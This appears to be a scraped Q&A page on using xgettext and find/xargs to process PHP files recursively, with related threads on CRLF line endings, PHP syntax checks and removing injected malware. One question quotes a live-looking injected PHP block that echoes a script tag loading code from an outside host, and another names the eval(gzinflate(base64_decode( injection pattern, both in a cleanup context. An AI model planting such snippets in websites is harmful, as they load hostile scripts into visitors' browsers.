How to use xgettext to parse a directory? - php

The manual lists a -D option for parsing a directory, but when I run `xgettext -D /home/cawa/www/zf2/` I get an error that the input file is missing.

The answer was:
find /home/cawa/www/deploy/module/Nav/ -type f \( -name '*.php' -or -name '*.phtml' \) -print > list
xgettext --files-from=list --language=PHP -j messages.po

You can use this command to recursively process all files in a directory:
find . -iname "*.py" | xargs xgettext --from-code utf-8 -o messages.pot

Related

Remove malware from PHP files

A block of code like the following was appended to every one of my .php files:
<?php
#bbf007#
if(empty($r)) {
$r = "<script type=\"text/javascript\" src=\"http://web-ask.esy.es/m2nzgpzt.php?id=11101326\"></script>";
echo $r;
}
#/bbf007#
?>
I need to write a bash script with a regular expression to remove this block from the code files. Please suggest an approach.
Backup first!
The following will take all but the last 8 lines from all .php files within the current directory and its subdirectories, and write them to a file called *.php.new:
find -name "*.php" | xargs -i sh -c 'head -n -8 {} > {}.new'
Then, move all the current php files to *.php.old:
find -name "*.php" | xargs -i sh -c 'mv {} {}.old'
Finally, move the .php.new files back to .php:
find -name "*.php.new" | xargs -i sh -c 'mv {} `echo '{}' | head -c -5`'
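Since the injected block is delimited by comment markers, a marker-based cleanup is also possible. This is a sketch that assumes the block is always wrapped in the exact #bbf007# ... #/bbf007# markers shown above; it deletes the marker lines and everything between them, in place, keeping a .bak backup of each file:

```shell
# Delete the injected block between its comment markers, in place.
# Assumes the markers are exactly #bbf007# and #/bbf007# as shown above.
# A .bak backup of each file is kept.
find . -name '*.php' -exec sed -i.bak '/#bbf007#/,/#\/bbf007#/d' {} \;
```

Note this leaves the now-empty `<?php` / `?>` wrapper lines from the injected block behind; an empty PHP block is harmless, but you may want to clean it up separately. Back up first regardless.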

Linux sed command replace string not working

My wordpress site has been infected with the eval(gzinflate(base64_decode(' hack.
I would like to ssh into the server and find replace all of these lines within my php files with nothing.
I tried the following command:
find . -name "*.php" -print | xargs sed -i 'MY STRING HERE'
I think this is not working because the string has / characters within it which I think need to be escaped.
Can someone please let me know how to escape these characters?
Thanks in advance.
I haven't tried this, so BACK UP YOUR FILES FIRST! As mentioned in some of the comments, this is not the best idea, and it might be better to try some other approaches. Anyhow, what about this?
find . -name "*.php" -type f -exec sed -i '/eval(gzinflate(base64_decode(/d' {} \;
If you have Perl available:
perl -p -i'.bck' -e 's/oldstring/newstring/g' `find ./ -name '*.php'`
=> all modified files will have a backup (suffix '.bck')
sed accepts different delimiters, such as # % | ; : /, in its substitute command.
Hence, when the substitution involves one of these delimiters, any of the others can be used in the sed command, so there is no need to escape the delimiter that appears in the text.
Example:
When the replacement/substitution involves "/", the following can be used:
sed 's#/will/this/work#/this/is/working#g' file.txt
Coming to your question, your replacement/substitution involves "/", hence you can use any of the other delimiters.
find . -name "*.php" -print | xargs sed -i 's#/STRING/TO/BE/REPLACED#/REPLACEMENT/STRING#g'
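If you prefer to keep / as the delimiter anyway, each literal slash in the pattern and replacement must be escaped with a backslash. This sketch is equivalent to the # example above:

```shell
# Same substitution as the '#' example, but with the default / delimiter:
# every literal slash is escaped as \/.
echo '/will/this/work' | sed 's/\/will\/this\/work/\/this\/is\/working/g'
# prints /this/is/working
```

The alternative-delimiter form is usually much easier to read, which is why it is preferred when the text itself contains slashes.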

I need a way to find all files containing odd ^M invisible characters

I know for a fact that these PHP files exist. I can open them in VIM and see the offending character.
I found several links here on Stack Overflow that suggest remedies for this, but none of them work properly. I know for a fact that several files do not contain the ^M characters (CRLF line endings); however, I keep getting false positives.
find . -type f -name "*.php" -exec fgrep -l $'\r' "{}" \;
Returns false positives.
find . -not -type d -name "*.php" -exec file "{}" ";" | grep CRLF
Returns nothing.
etc...etc...
Edit: Yes, I am executing these lines in the offending directory.
Do you use a source control repository for storing your files? Many of them have the ability to automatically make sure that line endings of files are correct upon commit. I can give you an example with Subversion.
I have a pre-commit hook that allows me to specify what properties in Subversion must be on what files in order for those files to be committed. For example, I could specify that any file that ends in *.php must have the property svn:eol-style set to LF.
If you use this, you'll never have an issue with the ^M line endings again.
As for finding them, I've been able to do this:
$ find . -type f -exec egrep -l "^M$" {} \;
Where ^M is a Control-M. With Bash or Kornshell, you can get that by pressing Control-V, then Control-M. You might have to have set -o vi for it to work.
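If typing a literal Control-M is awkward, a variant using Bash's ANSI-C quoting works too. This is a sketch: $'\r' expands to a carriage return, and the trailing $ anchors the match to the end of a line, so only genuine CR line endings match:

```shell
# List .php files whose lines end in a carriage return, without typing
# a literal Control-M: $'\r' is Bash ANSI-C quoting for CR, and the $
# anchors the match at end of line.
find . -type f -name '*.php' -exec grep -l $'\r$' {} +
```

Anchoring at end of line is what avoids false positives from a CR appearing elsewhere in a line.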
A little Perl can not only reveal the files but change them as desired. To find your culprits, do:
find . -type f -name "*.php" -exec perl -ne 'print $ARGV if m{\r$}' {} + > badstuff
Now, if you want to remove the pesky carriage return:
perl -pi -e 's{\r$}{}' $(<badstuff)
...which eliminates the carriage return from all of the affected files. If you want to do that and create a backup copy too, do:
perl -pi.old -e 's{\r$}{}' $(<badstuff)
I tend to use the instructions provided at http://kb.iu.edu/data/agiz.html to do this. The following uses tr to change each ^M in a specific file to a \n newline and writes the result to a new file (appropriate for classic Mac files with bare CR line endings):
tr '\r' '\n' < macfile.txt > unixfile.txt
This does the same thing using Perl instead; with this one you can also pipe in a series of files:
perl -p -e 's/\r/\n/g' < macfile.txt > unixfile.txt
The file command will tell you which kinds of line-end characters it sees:
$ file to-do.txt
to-do.txt: ASCII text, with CRLF line terminators
$ file mixed.txt
mixed.txt: ASCII text, with CRLF, LF line terminators
So you could run e.g.
find . -type f -name "*.php" -exec file "{}" \; | grep -c CRLF
to count the number of files that have at least some CRLF line endings.
You could also use dos2unix or fromdos to convert them all to LF only:
find . -type f -name "*.php" -exec dos2unix "{}" \;
You might also care whether these tools touch all of the files or just the ones that have to be converted; check the tool's documentation.
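If neither dos2unix nor fromdos is installed, GNU sed can do the conversion in place. A sketch, with the caveat that \r in the pattern is a GNU sed extension:

```shell
# Strip a trailing carriage return from every line of every .php file,
# in place, converting CRLF line endings to plain LF (GNU sed).
find . -type f -name '*.php' -exec sed -i 's/\r$//' {} \;
```

Unlike the tr approach above, this only removes CRs at line ends, so LF-only files pass through unchanged.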

Verifying PHP syntax in an entire directory, with xargs

ls -1 *.php | xargs php -l doesn't work; any clues why? (It only checks the first file.)
I am trying to detect parse errors in my whole application.
Thank you.
EDIT:
Came up with this, it is sufficient for my needs:
#!/bin/sh
for chave in $(find . -name '*.php') ; do
    php -l "$chave"
done
find . -name '*.php' -print0 | xargs -0 -L 1 php -l
This has the added bonus of working no matter what characters your filenames contain. Unfortunately I'm not sure why it's not working without the -L 1 part :(
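A likely explanation for why -L 1 is needed: php -l lints only a single file per invocation, so xargs has to start one php process per filename instead of passing the whole list to one invocation. (That behavior of php -l is my assumption here.) The stand-in below uses echo in place of php -l just to show how -n 1 splits the argument list:

```shell
# Demonstrate xargs running the command once per argument: -n 1 forces
# one invocation per filename instead of batching all names into one
# call. (echo stands in for php -l here.)
printf 'a.php\0b.php\0c.php\0' | xargs -0 -n 1 echo lint:
# prints:
# lint: a.php
# lint: b.php
# lint: c.php
```

Without -n 1 (or -L 1), the same pipeline would produce a single `lint: a.php b.php c.php` line, which is why a one-file-at-a-time tool only processes the first name.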
To only print the ones that fail:
find . -name '*.php' -print0 | xargs -0 -L 1 php -l | grep -v 'No syntax errors detected in ./'

Recursive xgettext?

How can I compile a .po file using xgettext with PHP files with a single command recursively?
My PHP files exist in a hierarchy, and the straight xgettext command doesn't seem to dig down recursively.
Got it:
find . -iname "*.php" | xargs xgettext
I was trying to use -exec before, but that would only run xgettext on one file at a time. This runs it on the whole bunch at once.
Yay Google!
For the WINDOWS command line, a simple solution is:
@echo off
echo Generating file list..
dir html\wp-content\themes\wpt\*.php /L /B /S > %TEMP%\listfile.txt
echo Generating .POT file...
xgettext -k_e -k__ --from-code utf-8 -o html\wp-content\themes\wpt\lang\wpt.pot -L PHP --no-wrap -D html\wp-content\themes\wpt -f %TEMP%\listfile.txt
echo Done.
del %TEMP%\listfile.txt
You cannot achieve this with one single command. The xgettext option --files-from is your friend.
find . -name '*.php' >POTFILES
xgettext --files-from=POTFILES
If you are positive that you do not have too many source files you can also use find with xargs:
find . -name "*.php" -print0 | xargs -0 xgettext
However, if you have too many source files, xargs will invoke xgettext multiple times so that the maximum command-line length of your platform is not exceeded. In order to protect yourself against that case you have to use the xgettext option -j, --join-existing, remove the stale messages file first, and start with an empty one so that xgettext does not bail out:
rm -f messages.po
echo >messages.po
find . -name "*.php" -print0 | xargs -0 xgettext --join-existing
Compare that with the simple solution given first with the list of source files in POTFILES!
Using find with -exec is very inefficient because it will invoke xgettext -j once for every source file to search for translatable strings. In the particular case of xgettext -j it is even more inefficient because xgettext has to read the ever-growing existing output file messages.po with every invocation (that is, with every input source file).
Here's a solution for Windows. At first, install gettext and find from the GnuWin32 tools collection.
http://gnuwin32.sourceforge.net/packages/gettext.htm
gnuwin32.sourceforge.net/packages/findutils.htm
You can run the following command afterwards:
find /source/directory -iname "*.php" -exec xgettext -j -o /output/directory/messages.pot {} ;
The output file has to exist prior to running the command, so the new definitions can be merged with it.
This is the solution I found for recursive search on Mac:
xgettext -o translations/messages.pot --keyword=gettext `find . -name "*.php"`
This generates entries for all uses of the method gettext in files whose extension is php, including subfolders, and inserts them into translations/messages.pot.
